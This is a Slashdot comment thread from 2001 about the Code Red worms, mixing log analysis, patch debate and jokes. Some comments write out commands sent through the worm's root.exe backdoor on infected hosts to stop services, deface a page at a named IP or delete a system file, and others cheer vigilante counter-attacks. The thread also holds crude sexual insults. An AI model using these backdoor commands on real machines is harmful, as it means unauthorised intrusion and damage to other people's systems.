I had it ready to go five minutes after the advisory was released, but couldn't install it for a week, because of management. The NT folks go through similar problems.

RedirectMatch -- http://www.microsoft.com (!)

[mkcmkc]

Interesting idea, but shouldn't the redirect go to microsoft.com?

They set up this Internet load test after all; I'm sure they'd like to hear of the results...

--Mike

Deredoc

[RobertGraham]

http://robertgraham.com/tools/deredoc

Source compiles on Windows and Linux, binaries available, works with libpcap, can respond back to a range of addressses.

BTW, this technique has been used since the early-1990s (i.e. I wrote a plugin for the ProTools sniffer that did something like this).

Re:Responsibility lies with the Network

[medcalf]

Well, yeah. I build ISPs for a living. Most of the ones I work with have intelligent routers/firewalls, and it would be fairly easy to shut down port 80 outgoing from specific boxes. That wouldn't stop anything on the local subnet, but it would at least begin to contain the problem, and would alert the clueless (since they wouldn't be able to get out via the web).

As an aside- the first comment was rated a troll????

-jeff

"Spread of Diseases"

[szomb]

Most proponents of prostition prohibition say it's because it spreads diseases. On the same grounds, we should institute a ban against running Windows servers. :)

Windows = the cheap $2 whore

Code Plaid

[spack]

If Code Red keeps getting worse, it won't be red anymore. It will be Plaid.

Oh my God! They've gone to plaid. -- Lonestar from Spaceballs: The Movie

Public Logfile - for *Educational* Purposes Only

[BigBlockMopar]

I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log
should we set up a site somewhere of ip addrs?

Already got one! Remember, the list, including fully-qualified hostnames, is for _educational_ purposes only. I've made it available so that we can study how this thing moves, not for such purposes as mass-spamming postmaster@$IIS-INFECTED-HOSTNAME with flames reminding him that he is a bliterhing idiot, nor for other untoward activities which may be performed on a machine with a shell in a webserver's public directory.

Bill Gates

[speederaser]

Brighter than me Brighter than you Brighter than anything On your shoe

Re:Microsoft should be sued

[Dr+Caleb]

Why do poor bastards get sued for using a little bandwidth to participate in an interesting project... [*snip*]... To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected Let's look at that shall we...

2 patches, ~500k for both. 1 for NT4, one for W2k.
[20 million 'registered' users] * [8.5 million "gates.bill@microsoft.com" entries] * [2 million bad addresses bouncing both attachments back]= The biggest DOS spam attack in history!

Exercise for the student: Multiply that by $0,59 for every bit/s it spends in Georgia...give 3 examples.

Re:Well...at least RR is trying to help...

[davidbarrett]

I think they've already dropped them from the network. I noticed that default.ida requests dropped from my server log starting a few days ago... And good observation ... I thought it was a bit ironic that RR was advising everyone to be aware of the possibility for infection .. nevermind the fact that you're not supposed to be running a server.

CodeRed Information

[SpunOne]

CodeRed - There were two versions of the original CodeRed worm, both of which were strictly memory resident and fairly tame, all things considered. Both of these will show NNNN's in your log files. You can find more information here.

CodeRed 2 - This is the worm we're seeing now, the one with the XXXX's in your logs. This worm seems to most frequently scan in it's own IP range (Class A I think?) So, if you're in the 24/8 range, you'll probably see a lot of scans from people using various cable providers. You can find more information about CodeRed 2 here.

So far, I haven't seen anything on the security sites confirming a 3rd version of this worm. The media has often used the term CodeRed3 to describe what is actually CodeRed2, the one giving us grief right now.

If a new variant of this worm does make it into the wild, it'll be interesting to see how quickly it can spread. It seems that a lot of hosts infected with CR2 give the error (403.9 Too many users connected) when you try to access port 80, which causes the eeye scanner to miss them, and apparently keeps them from being exploited by a new worm. It also keeps people from getting to the /scripts/root.exe that CR2 leaves behind as a backdoor. I'm not sure why IIS would give an error about too many users being connected when in reality, the number of CR hits are around 1-2 a minute. It's likely that the IIS process looks for the number of open sockets and then gives that message if there are too many sockets open. This would make sense since CR2 will open up ~300 connections in its attempt to spread.

It was also mentioned yesterday that NT4 servers that have been patched are still vulnerable to CR2 if they're using redirection. This seems odd to me, since the patch should have fixed a buffer overflow in idq.dll. If that overflow was fixed and IIS is still crashing, perhaps there is another buffer overflow that's showing up when it gets the long string from CR2 as part of the redirection. Just a guess on my part though.

self-patching servers

[rajslashdot]

I was wondering. How difficult would it be for Microsoft and other server vendors, to write servers that can be self-correcting ?

Would it be too difficult for a server to be progammed to refer to a pre-programmed web url and download and apply any patches as applicable, automatically ?

This would be a better solution than having "clean-up" viruses, as has been suggested in earlier discussions !

Re:self-patching servers

[sjonke]

Wonderful idea - now IIS will do all the virus inflicting work itself!

Re:Microsoft should be sued

[blang]

The average Joe Schmoe is not living in a trailer park. There are tons of middle managers, and others making a decent amount, who would think nothing of paying $100's extra for software, for the same reason that they'd get a Lexus or Mercedes. Of course they need Win2k.

Comment removed

[account_deleted]

Comment removed based on user account deletion

Wow

[truthsearch]

I had to read your post twice, but are you saying that people are installing Win2K and NT with the IIS service automatically running and they haven't noticed??? Wow. The reason I'm surprised is that 2k and NT are usually used by people who are at least a little tech savvy. They're not standard home OSes. I guess I shouldn't be too surprised, but it sure doesn't take a server admin to see the little IIS icon next to your clock with a green arrow showing it's running. Move the mouse over it and it says "IIS - Running". That's pure incompetance on the user's part (and bad design on the OS install to have it run auto by default).

Re:Wow

[rprycem]

What version of IIS are you running? I have never seen this green arrow. I do a whole lot more NT / 2k administration and consulting then I care to admit to. Maybe this is something related to PWS?

Morality of Counter Measures?

[Maul]

I have a bunch of IPs from my apache logs of attempted attacks on my box. Since I'm running a Linux box, I'm not getting infected, but I was thinking about putting a script on my error page that would SHUT DOWN (not reformat the HD) a compromised box (since the command line is fully available on a compromised machine). I know that this has been suggested...

My only question is if such a counter measure is moral / legal. Unlike the proposed counter measure worm, this wouldn't propogate. It'd only affect boxes infected with Code Red II. I'm not sure that messing around with the machine of another user, despite my intentions or the infected state of a box, is legal.

Re:Morality of Counter Measures?

[perrin5]

Personally, I think Legal and moral issues can be damned here: It's Freedom of Speech.

If you were to get sued, you can simply say "your machine was accessing freely published material" and tell them to shove it.

They can't sue for damages, because they can't prove that you caused any harm that Code Red didn't already cause...

Just my $.02

Re:Buffer overflow vulnerabilities

I wrote an all-Java OS in 1998 but can't be sure if or how it works... it's still booting.

Re:Stop addressing administrators!

Address the real perpetrators! They hide in redmond washington, behind a waterfall of payoffs to hundreds of government officials and journalists.

Extrapolation.

[Harbinger(JDW)]

It seems likely that eventually what is going to happen is that server software will be released (IIS, Apache in a matter of time). Shortly after the release a virus will exploit a weakness found in the software and spread itself like crazy all over the net. Due to the way that SysAdmins have to fix the problem (patches) there will always be vulnerable servers out there. These vulnerable servers will continue to get infected and/or continue to infect other people.
So now our average user wants to set up a server and buys the software a few weeks after it is released. They set it up and connect to the internet to get a patch (we'll assume they will at least try to, which is something that definitely doesn't happen). What will happen is that by the time that they navigate around the web sites of the software and find the patch their server is already infected. Now if the infection is mean it will not let them download the patch and/or let the user /think/ the patch was downloaded and installed properly but it wasn't really and the virus keeps working, infecting other vulnerable people.
The interesting thing here is that the internet has the potential to be a huge warzone of virii where new software just out of the box a few weeks after release is vulnerable. When people install it, it gets infected before they can fix the vulnerabilities. One solution is of course to install the software and patches offline and then put the machine on the internet. The solution isn't always plausible however, especially if the software used to download patches is the software that the Virii attack.
Most people don't necessarily consider the Internet as a hostile place, but if Virii continue to be released as fast as software is then soon everyone will be affected and find the Internet hostile.

Just some of my thoughts.

Re:Just an obvious question or two...

Mod the above post up!

How about this:

[wirefarm]

Don't patch if it will break other server stuff.
Turn off IIS.
Install Apache to your Windows box.
Problem solved.
If you can't do that, just turn off IIS, we don't need your content that much.

Cheers,
Jim in Tokyo

Hogwash

[gamorck]

Guys - there is no new code red variant. None of the security sites I frequent mention another variant. The CNET article Taco links to simply describes exactly what the so called "Code Red II" (the third variant in reality) does.

Why cant slashdot at least pretend that they are a real news site and try to verify this stuff? When the CNET article mentions Code Red 3 they were obviously mistaken. The point of the article is obviously to alert the world that Code Red had started attacking some oriental countries. Who gives a crap? Welcome to the rest of the world people.

As for your problem Taco - disable Apache and stop whining - we are all getting hit with this just as hard or harder. Your whining will accomplish nothing other than agitate a few more people.

Gam
"Flame at Will"

Re:Sig (Offtopic)

[Anomymous+Coward]

not all sigs are meant to be funny? but yea, it's humorous, in a jealous sort of way.

Not Legal : Patent Problem

[Rashkae]

If you did that, you would run afoul McAffee's Patent on Web based virus removal and system administration.

Qwest is Calling Their DSL Customers

[VB]

Qwest: Hi, we're calling all of our customers to find out if they've been affected by the Code Red virus. Have you been affected?

Nope.

Q: Huh?

I nat everything through the router to an internal firewall. Disable the web interface.

Q: Okay. Thanks.

Don't mention it.

= = =
Qwest in Phx. Impressive customer service effort.

cisco is god

[mdouglas]

i found this on NANOG :

how to stop the spread of code red with acl's on routers

http://www.cisco.com/warp/public/63/nbar_acl_cod er ed.shtml

Call in the BSA!

[wirefarm]

I came to the same conclusion that you did - I'm getting hit by home users - ATT.co.jp in my case.
People with the same dialup connection that I have.
Where do home users typically get their copy of Win2K or NT Server? Yup, that's right, they 'borrow' it from work.
So start telling people the 'truth' - That Code Red is actually the BSA's way of routing out unlicenced Windows installs...
;-)
Pity that the 'default page' on IIS doesn't list the 'Registered User' on it. That would get people turning off unused servers.

Funny thing is that I had just written the firewall explanation page below as it became very timely - I now get more hits for that than from Code Red.

Cheers,
Jim in Tokyo

Is this a trick from Hollywood?

I mean, who else would come out with THREE versions of an original idea, each one worse than the one before?!?

Re:Is this a trick from Hollywood?

Notice how Code Red is starting to resemble the Rocky movie sequels?

Aaaaadriannnnnnnnnnnnnnnnnnnn!!...

Code Red (I,II,III) Fix for Apache webservers

Redirect /default.ida http://www.microsoft.com/default.ida

Re:Code Red (I,II,III) Fix for Apache webservers

[CM39]

I tried redirecting it and it didn't work. :-)

Re:Code Red (I,II,III) Fix for Apache webservers

Redirect /default.ida http://www.microsoft.com/default.ida

Why not redirect it back at the infected server. That could be interesting if it actually follows the redirection.

Even Better. Much, actually.

[szomb]

Rather than just putting it on a few of your own machines, how about overwriting the default.ida on your "attacker's" box (since it's root-compd) to do the same?

Seems a little more ethical than just taking it down, which of course is what we all WANT to do (grrr, I wish I had an offshore co-lo server.)

Code Red III

[red0x]

I read about Code Red III being a translation error from korean ppls. Read Bugtraq, Code Red III does NOT exist (yet).

Also, more on code red II variants...

> My iis5.0 (patched) logs show the length of the original CodeRed II worm as 3818.

>It's the same Code Red II.

>The overall request is usually 3818 bytes, but this is 3379 bytes of payload
>plus whatever headers are used:

> GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXX....
> Content-type: text/xml
> Content-length: 3379
>
> {{3379 bytes of binary data here}}
>
>I routinely find other headers too, such as:
>
> GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXX....
> Host: 64.170.162.100
> Connection: keep-alive
> Content-type: text/xml
> Content-length: 3379
> Via: 1.0 ampere (NetCache NetApp/5.0.1R2)
> X-Forwarded-For: 212.198.146.153

> {{3379 bytes of same binary data here}}

>Same great taste, just a bit more filling.

>No evidence *whatsoever* of any Code Red II variants.

>Steve

--red0x

Uses for compromised machines?

Am I the only one who sees all those wide-open machines in my fw logs and thinks: SETI@home all time winner?

Shutting off IIS on an comprimised box...

[Xibby]

All it should take is sending a request like this: http://infected.host/scripts/root.exe?/c+start%%20 net%20stop%20ServiceName+c:\\

Figure out what the service name for IIS is and you can make it do a clean belly flop. No real damage done.

A full list of the exact services is found in the registry (run regedit.exe) under the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es key.

Other things you could stop are Server and Workstation, and Maybe Simple TCP/IP Services. There is plenty you can do to a NT box with just the command line. And it starts getting really fun after you install the NT resource kit.

I know more than I ever wanted to know about NT...

Re:Shutting off IIS on an comprimised box...

[Zibby]

Yeah, that was intentional. Play with it a bit and you'll hit paydirt sooner or later. ;)

Re:Microsoft should be sued

[fors]

Install IIS. Did it to me. I have an advantage though, my W2K system can't be gotten to from the net. I wouldn't have W2K at all but work requires it.

How can They Justify It's the 3rd Sequel

[robbyjo]

I really don't know why the people could justify that it is really the third sequel of the virus meanwhile the report says:

"About 10 damage reports have come in which were believed to have been the result of the latest Code Red III,"...

It's still only 10 damages and the cause of the damage is not yet known. Those people in news really clever in getting attention...

Usually viruses are called its sequel only if they exhibit some degree of likenesses in binary form (correct me if I'm wrong). Even, some is not considered as the sequel, only variants. Remember those days when Jerusalem-B or Michaelangelo attacked? This time, we really don't know what the Code Red 3 look like and they said it's the 3rd sequel?

Thanks for the suggestion

[WillSeattle]

I have no idea how you can make a wider back door than CRII. With CRII, the back door has full administrative rights and you can execute arbitrary commands. The machine is FULLY compromised. Plus, due to the nature of the worm each compromised machine broadcasts its IP address to nearby machines. The only way to get a wider back door than CRII would be to put the back door on EVERY PORT.

OK, it will be ready in an hour, just got to build the array handler routine.

Re:Put it in another log and forget about it.

ach - I meant: http://64.173.108.11/scripts/root.exe?+%2fc+echo+% 22document.location%3d%27http%3A//goatse.cx%27%22+ > +..\wwwroot\default.htm

Re:Buffer overflow vulnerabilities

>Us java programmers are laughing our asses of
>each time a buffer overflow is wreaking havoc on
>the internet. We don't have to worry about such
>things. Java may not be the greatest thing, but
>you can rest assure that buffer overflows won't
>happen.

Isn't the Java runtime machine written in C/C++?

it could be real

it could be a real 3rd (4th) variant. see http://www.securityfocus.com/archive/75/203279 for details.

Re:Buffer overflow vulnerabilities

[unitron]

But think of the great uptime stat you've got going!

Getting back...

Don't you think its possible that we should be able to begin isolating where these worms are originating? After *three* releases, this guy is really pushing things...

Microsoft should be sued

[Rosco+P.+Coltrane]

Why do poor bastards get sued for using a little bandwidth to participate in an interesting project while Microsoft gets away with releasing shoddy products that slow down the entire Internet ?

I know gun manufacturers shouldn't be sued when someone commits a crime with a firearm, and in that case the people who created the lame Code Red virii should be sued primarily, but I still think Microsoft is guilty here because their customers weren't aware their Windows-running boxes could start chewing up bandwidth like crazy simply because the OS vendor doesn't give a damn about these things.

To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected. Therefore, at the very least, I reckon they should be ordered to pay damages to telcos and ISPs for lack of due diligence.

(of course, in Georgia, I'd also be happy to see the state sue them for 59c per second of wasted bandwidth as well :-)

Re:Microsoft should be sued

[IronChef]

you have it backwards. The tide is the industry. The consumers are in the castle.

Re:Microsoft should be sued

But MS make it so easy for non-sysadmin types to install such earth shattering software. Average Shmoes wouldn't know the impact of click yes to install all software. A real Sys admin understands the consequences and that he/she needs to maintain the securty. Most NT admins I know don't understand the full consequences themselves. Just another reason why the MS philosophy of making computer systems more accessible to the computer-uneducated has a fundamental flaw when it comes to high level services. To use the car analogy others use here, they don't sell cars to 8 year olds, and the state govs don't give licenses to 8 year olds either. In MS business practice they would.

Re:Microsoft should be sued

[mpe]

Because we're not talking about admins, but gullible users.

Quite often with Windows the expectation is that "users" and "admins" are one and the same though...

Re:Microsoft should be sued

Christ no. We're already having to fork out $4.00 a pack for Mollies in a tobacco-growing state as a result of the state AG extorting money out of everybody else on behalf of the health-care/insurance/financial/welfare racket.

If you have to sue MS. let it be a consumer class-action. That way you might see something out of it, at least.

"Luke Duke"

Re:Microsoft should be sued

[Eyston]

You think Joe Schmoe shelled out a few hundred bucks for Win2k/NT? I don't think so. CodeRed is attack of the MS warez pirates. Makes it hard to sue someone for software you stole in the first place (although it'd be funny watch). -Eyston

Re:Microsoft should be sued

[RobYoung]

To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected.

To solve the problem of servers being shut down and the internet being slowed down, we're gonna send emails to every single Windows 2000 user?

I agree with other posters that the responsibility is in the hands of the system admins and the home users (i do believe cable and DSL are being hit hard, too). MS has done what they can by making the patch availiable, and the media "hype" involved with this virus should be enough for admins and users to download the patch.

Re:Microsoft should be sued

[Kaki+Nix+Sain]

If you are an owner responsible for any car, regardless of the manufacturer, it's your job to be aware. However, that does not allow the manufacturer to abdicate all responsibility for the results of others using their vehicles. Is there a principled difference between these two domains? Perhaps software makers just like their current lack of responsibility; I did too. I was also a child, as were the other production industries, but I grew up and so have they (to some extent).

Re:Microsoft should be sued

[Keith+Russell]

...most of the sites were Joe Schmoe's cable modem surfmachines with nothing on. Their only crime was to purchase the damned software.

IIS doesn't even run on 9x, ME, or other spawn of 3.x. 2000 Professional* does not install IIS by default. Your Joe Schmoe must have either installed IIS after installing W2kPro, or installed W2k Server, which does install IIS automatically. Either way, he took deliberate action to make his PC a server, and with it, took on the responsibility of keeping that server up-to-date.

Claiming that Microsoft should be liable for sysadmins who are some combination of naive, out of touch, unqualified, or just plain stupid is like claiming that I can sue Honda because my parked car was sideswiped by an unlicensed, drunk driver who just happened to be in an Accord.

*: This also applies to NT 4.0.

Re:Microsoft should be sued

[blang]

Because we're not talking about admins, but gullible users. When I did a quick toor to the hacked sites in my apache log, most of the sites were Joe Schmoe's cable modem surfmachines with nothing on. Their only crime was to purchase the damned software. Nobody ever told them that the software is considered harmful, and needs constant babysitting. Sounds like a good enough reason for a class action law suite to me.

Re:Microsoft should be sued

"Or else his PC vendor sold him the thing pre-configured with Win2K Server. That doesn't seem unlikely to me at all. "

Considering W2K Server is a $500-some dollar line item on the invoice, I really doubt it. I think we can chalk the mayhem on cable/dsl networks up to warez and warez alone.

Re:Microsoft should be sued

Things you buy shouldn't suck.

what if i bought a ho? she should suck golf balls thru a garden hose. bizatch, you better gobble that cock!

Re:Microsoft should be sued

[cr0sh]

I can't count the number of times when patches have been applied to NT-based servers, only to have other server software (generally third-party) die after the patch is put into place.

Certainly, applying the patch is a necessary thing - but when you look at it from a business perspective, which is worse:

1. Apply the patch, have our other server stuff stop working (say, our lovely ASP stuff), and lose money - but save the rest of the internet.
2. Don't apply the patch - we keep making money - and screw everybody else - we will wait.

Suddenly, it all makes sense...

Re:Microsoft should be sued

[garcia]

yeah, this is true, but it is MS that has it turned on by default w/o letting the average user (which by the way is their intended target) know.

it is both MS's responsibility and the user's. I agree that the user should know what the hell he is doing, but MS should not have *ANY* service installed by default w/o telling the end user (especially when targeting the market they are).

Re:Microsoft should be sued

[blang]

Printing it in a license does not excempt them from state and federal laws, not to speak about other countries.

If reckless conduc atnd damages are proved, the little print in the license is not worth piffle.

Details?

[agusus]

That Cnet article isn't very descriptive... does anyone know the details on it... what is a "wider" back door - how much wider could it get?

Part III?

[CzarnyKozak]

I haven't done any analysis of the worm myself, but has anyone questioned the possibility that this new version is phase two of the original worm? Not the same code per say, but perhaps the old code red does something to tell the new code red to "come here" or something? The fact the old code red is turned off tells me that they might be linked to the same person(s) or something.. if I were some independant cracker I wouldn't bother getting rid of the old one since that's another thing which might break when I launch the new worm.

What to do with server logs?

2001-08-03 03:27:38 Should I bother to report cracked systems? (askslashdot,spam) (rejected)

The world may never know....

Finally

[nEoN+nOoDlE]

Sequels that are actually better than the original.

Re:Finally

American Pie 2 was better than the original... go check it out if you're under 30. :-)

Re:Finally

[silent_poop]

So should this one be titled 'Code Red Strikes Back' or 'Return of the Code Red' ?

Re:Sig (Offtopic)

[fatarfy]

If Bill Gates had a nickel for every time Windows crashed...
..oh wait, he does.

Thats the funniest sig I've seen on slashdot!

I know what I did!!!

[InfoSec]

I went into my apache config, and set up the PHP mime type to interpret .ida extensions as PHP addresses. I then wrote a PHP script called default.ida which opens a socket back to the requester on port 80, requests /scripts/root.exe, and then sends "del c:\winnt\system32\ntoskrnl.dll". This may look overly nasty, but in truth I never send a confirmation (you know, it asks "Are you sure(y/n)"), so the file isn't actually deleted. The whole idea makes me feel happy though!!!! :)

Guess I'll have to avoid synagogues.

[Ungrounded+Lightning]

I've been reading your sig for a while now. I think the sig from Deuteronimy(sp?) might apply to you.

Guess I'll have to avoid synagogues.

But I thought Deuteronimy was a sin whose commission involved Hydrogen 2. Setting off fusion bombs, maybe?

Re:Well...at least RR is trying to help...

[analog_line]

Now...how are they supposed to get the patches, tho...?

They've had a month to get the patch. If they haven't by now, whenever they get back from Pluto, they can use a friend's cable modem or a POTS modem and get the relatively small patch. I'm finding it hard to generate any sympathy for people still infectd by this virus.

More info?

[Mike+Hicks]

Anyone have more info? How it looks in logs, etc.?

Dissection of Code Red versions...a timeline:

V1: Basic worm code
V1.1: Enhanced code
V2: Back door "feature"
V3: Faster attack "feature"
V3.1: Faster attack and multiple backdoor "feature"

------Today: Slashdot reports Code Red V4

V4: Failed version, the worm can't infect other systems, author too dumb to put dots in IP address
V5: Total code rewrite, GNU licensed, autopatch feature (downloads a copy of bsd or linux and installs it on the NT box)
V5.1: Faster reinstall (err....patch), now the user can select wich OS/distribution.

------Next Week:Meanwhile, Microsoft patents the "Internet Worm" concept.

V6: Final release, the worm now infects the victim's server and start to post comments in Slashdot about Code Red...

Re:ok you bigots :)

[Gnea]

you hope i wasn't serious? please explain.

And to think...

[nion]

if these servers simply ran a cron job to apt-get the latest security updates... Oh, wait. Nevermind. ;)

If the log hits aren't for you, do the right thing

[Darby]

and see that they go where they belong. I mean seriously, I've seen lot's of sites with a domain name which I thought was some other much more popular site which had a small link at the bottom saying something to the affect of: If you're looking for such and such they're actually located here.
It's just common courtesy provided it isn't a competitors site.

So what you do is set up a script to pull each individual Code Red transaction out of your logs and send an email to support@microsoft.com with a message similar to the following:

A user at IP address x.x.x.x was trying to contact you and got my IP address by mistake. I know how important the needs and desires of your customers are to Microsoft, so I was certain you would want to know about this as soon as possible.

Yes, switch to Linux and never patch your machine

that would be so much more secure. Very insightful +3.

Re:Buffer overflow vulnerabilities

[TheMidget]

> It is possible to do the same think with any programming language I can think of (even basic but you would have to write your own routine for it).

Show me how to do it in Java, or in Perl? And no, using JNI (or XS) is cheating.

Oddly enough...

[Nafai7]

The press is going MUCH easier on Microsoft than they ever were on Firestone.

Code Red 'counter'

[Delphis]

I'm not too worried about the IP address, although I am interested to know how many times an infection attempt has been tried (amusing when you're using apache 1.3.20). The simple command:

cat /var/log/httpd/*/access_log.099* | grep default.ida | wc -l

acts like a simple 'counter', if you have your logs for different sites split up and using rotatelogs like I do.

Poll idea

[moz25]

Well, an interesting poll might be: "how often has your web server been probed for ISS vulnerabities"?

My web server (listening to 10 ips) has been probed exactly 7623 times. Pretty stupid, since I don't even run IIS. Oh well....

Moz.

Re:ok you bigots :)

[dermotfitz]

erm
that's crII brother. Not III. III is unknown to us so far.

"If you sue us, we'll sue you."

[yerricde]

Printing it in a license does not exempt them from state and federal laws

Fine Print: "You agree not to hold us liable for any damages. If you do sue us, this license agreement is terminated, you have no rights under this EULA, and we'll sue you for copyright infringement and win because we have billions of dollars of cash on hand to buy out half the law firms in the United States."

not to speak about other countries.

Fine Print: "This agreement is subject to the laws of the United States of America and the State of Washington without respect to conflict of law provisions."

If reckless conduct

What is reckless? "This software comes with ABSOLUTELY NO WARRANTY." The GNU GPL says it; most other other EULAs say it too.

Just an obvious question or two...

[glebite]

Has anybody in this forum had a machine in their universe infected by the Code Red worm? (any variant) You can reply as AC if you wish...

Secondly, when Code Red was on your machine, was net access notably slower? Basic machine performance slower?

I'm just curious as I would figure that an infected machine with several threads of code running would slow my machine down to the point that even if I had no knowledge if IIS were on my machine, I would at least notice a difference...

I personally think hearing of people's experiences, getting some message out to the press might help. (ie - cable modem and other users running Windows NT or 2000 might have noticed a performance degradation - check for this patch to download) (as if the press coverage wasn't enough to warn people...

More info on Code Red III

[Sideways+The+Dog]

WARNING, VIRUS ALERT!!!

If you see a message on the boards with a subject line of "Hi, how are you," delete it immediately WITHOUT reading it. It is "Code Red III". This is the most dangerous virus yet. It will re-write your hard drive. Not only that, but it will scramble any disks that are even close to your computer (up to 20 feet). It will recalibrate your refrigerator's coolness setting so all your ice cream melts and milk curdles. It will demagnetize the strips on all your credit cards, reprogram your ATM access code,screw up the tracking on your VCR and use subspace fieldharmonic to scratch any CDs you try to play.

It will give your ex-boy/girlfriend your new phone number. It will program your phone autodial to call only your mother's number. It is insidious and subtle. It is dangerous and terrifying to behold. It will mix antifreeze into your fish tank. It will drink all your beer.It will hide your car keys when you are late for work and interfere with your car radio so that you hear 1940's hits and static while stuck in traffic.

It will give you nightmares about circus midgets. It will replace your shampoo with Nair and your Nair with Rogaine, all while dating your current boy/girlfriend behind your back and billing their hotel rendezvous to your Visa card. It will seduce your grandmother. It does not matter if she is dead, such is the power of "Code Red III", it reaches out beyond the grave to sully those things we hold most dear.

It will rewrite your back-up files, changing all your active verbs to passive tense and incorporating undetectable misspellings which grossly change the interpretation of key sentences.

"Code Red III" will give you Dutch Elm disease. It will leave the toilet seat up and leave the hairdryer plugged in dangerously close to a full bathtub. It will wantonly remove the forbidden tags from your mattresses and pillows,and refill your skim milk with whole. "Code Red III" is an evil virus conceived by evil people. It is also a rather interesting shade of mauve. These are just a few signs. Be very, very afraid. PLEASE FORWARD THIS MESSAGE TO EVERYONE YOU KNOW!!!

K5 contest

That contest is already running on Kuro5hin. The big "problem" is that many systems don't run IIS with Administrator priv, so the backdoor is limited in how much repair it can do.

I just have my web server do a "net send %DOMAIN%" to warn them about their problem.

Re:Well...at least RR is trying to help...

how about a link?

Re:Sig (Offtopic(Offtopic))

[Cardhore]

heheh funny story.

someone should make a "sig archive" on the web, with people's signatures and whose they are.

Responsibility lies with the Network

[medcalf]

Admittedly, MS shipped a flawed product (IIS), and shipped it to users who have no idea that the product is even running on their box. Bad MS! Bad!

Admittedly, most computer owners are idiots (assuming that computer users are evenly distributed throughout the population, which mostly consists of idiots) and don't patch their machines regularly, or at all. Bad user! Bad!

However, it is counter-productive to bash MS for this, because they have released a patch some time ago and what else can they do? It is counterproductive to bash the users, because most of them don't know how to install a patch, or even what a patch is, and have no source of information to help them out (and even if MS mailed out information, how many of these users could and would understand and follow it? - they need someone who knows what they are doing to help them, and they don't know that they need that help).

The only place that this worm can be stopped is at the network level. ISPs need to block not inbound port 80, but outbound port 80 from machines on their network known to be infected. Better yet, redirect all outbound port 80 from known-infected sites to a web page at the ISP which explains the problem and how to fix it, and what number to call for more help and to get your web access turned back on. DO NOT use this to get a fix on who's running servers on your network that you need to punish, or people will stop calling you for help! This cuts the spread of the worm immediately, because an infected machine can no longer spread past the first router it comes to. It also gradually cleans up the problem at the source, and eventually most of the infected machines wouldn't be. Those machines not fixed would at least not be able to spread the infection, because the pathway would be closed. This were done at each level of the network, the worst case would be a machine that could get out to the backbones because of sloppy admins at the ISP, but then would be caught and blocked by the backbones.

The whole idea is to fix the problem, rather than bitching about who should not have let it happen in the first place.

-jeff

Re:Responsibility lies with the Network

[JohnnyBolla]

Do you have even the slightest idea what kind of hardware upgrade this would require on most ISP's?

my last hit...

[icantremember]

24.187.23.157 - - [09/Aug/2001:15:22:19 -0400]

thats my last code red v.anything hit...
i am on a 24.x.x.x address space from my cable modem provider, and the lately unstoppable modem blinking has slowed down quite a bit...

mike

Re:Well...at least RR is trying to help...

[Megahurts]

> (not that you're supposed to be running a server anyway...)

hmm... I never saw anything along those lines in my TOS. I didn't sign it anyway. The installation oafs were dumb enough to let it slide.

Re:Well...at least RR is trying to help...

[Mynn]

I thought it was a bit ironic that RR was advising everyone to be aware of the possibility for infection .. nevermind the fact that you're not supposed to be running a server.

But if you are running OFFICE2000 with FRONTPAGE2000 you are vunerable, too.

sick of the log entries

[Defiant+One]

Don't know about you, but I'm sick of looking at this crud in my logs. Unfortunately, trying to redirect, rewrite or otherwise filter the request, along with the "vti" hack from FrontPage, just produces either the same log entry with a 302 in place of a 404, or a double entry with the request and the redirect.

Makes me want a stripped down filter box to grab those requests and not log them. How many terabytes of wasted disk space is going to be devoted to M$ hacks in rotating logs??

Hey!! I have a question!

[ioman1]

Where are the Code red viruss's originating from?

Re:Hey!! I have a question!

[c13v3rm0nk3y]

It is the question that burns your mind, like an itch you can't scratch. You want to know What. It. Is.

The Code Red is all around us. It is the air you breath, the food you eat. Code Red is there when you go to work and when you pay your taxes.

Code Red III sighting

No, I tend to believe there is a new worm. I got hit 12 times within a minute by a server in South Korea -- from the same city as mentioned in the Reuters story. That's not how the earlier worms behave.

It was a university server, so I assume my automatic net send to their domain got some attention.

Names ?

Can't someone give these sequels better names. Sequel naming is a serious issue. Look what's happened to Star Wars.
How about :
Code Red II : Return of the Virus
Code Red III : The Press gets excited
Code Red IV : The Press gets bored
Code Red V : Y2K redux

How can you get a BIGGER back door than CRII?

[Enigma2175]

from the article:
leaves a wider "back door" on infected machines, making them more vulnerable to future hacking.

I have no idea how you can make a wider back door than CRII. With CRII, the back door has full administrative rights and you can execute arbitrary commands. The machine is FULLY compromised. Plus, due to the nature of the worm each compromised machine broadcasts its IP address to nearby machines. The only way to get a wider back door than CRII would be to put the back door on EVERY PORT.

Well...at least RR is trying to help...

[Opusnbill7]

According to one of their help pages, they're going to start kicking people off of their network who are infected on Tuesday. Now whether that was last tuesday or this coming tuesday wasn't clear, but at least that will help cut some of the traffic down. Avoids the whole blocking/filtering port 80 issue also (not that you're supposed to be running a server anyway...). Now...how are they supposed to get the patches, tho...?

Linux to the rescue?

[small_dick]

I have heard the affected machines have a r00t kit installed.

If so, I wonder if some white hats could write a script that:

1)detects an attack;
2)goes into the Windows machine;
3)installs the MS patch;
4)reboots the Windows machine.

That, altough technically illegal, would help clean up the problem, no?

Re:Linux to the rescue?

If so, I wonder if some white hats could write a script that:
1)detects an attack;
2)goes into the Windows machine;
3)installs the MS patch;
4)reboots the Windows machine.

Let's rephrase this...
1)detects an attack;
2)goes into the Windows machine;
3)format's C:
4)reboots and installs Linux.

and for all you idiots saying that apache is so bad, how come there is 26 Fucking pages of HOW-TO secure iis? How about 1 file? How about 1 page? if apache has a problem, boom we download a new version -- problem solved.

Buffer overflow vulnerabilities

[loki4eng]

Is what happens when you code your OS in C++. Sorry all you C++ dudes, but you know it's true.

come on III, kick II's ass

[dermotfitz]

I think this is really fun. Of course I am not an ISP or anything. Anyway, I am looking forward to a nice DDOS of whitehouse.gov this time around. That'd be fun wouldn't it? This is some nice distributed computing :) Has there ever been a virus so widespread as Code Red X ? Is this going to be the future of virus writing? Imagine something similar being written for routers? By the way, is it possible to write a virus that can't be decoded by the spoilers over at Eeye and all you old programmers out there? Would it be possible for someone to put one together that noone know what it was going to do until it did it?

Wednesday's article.

[hivolt]

Fight virus with virus

Its called personal web server

[gad_zuki!]

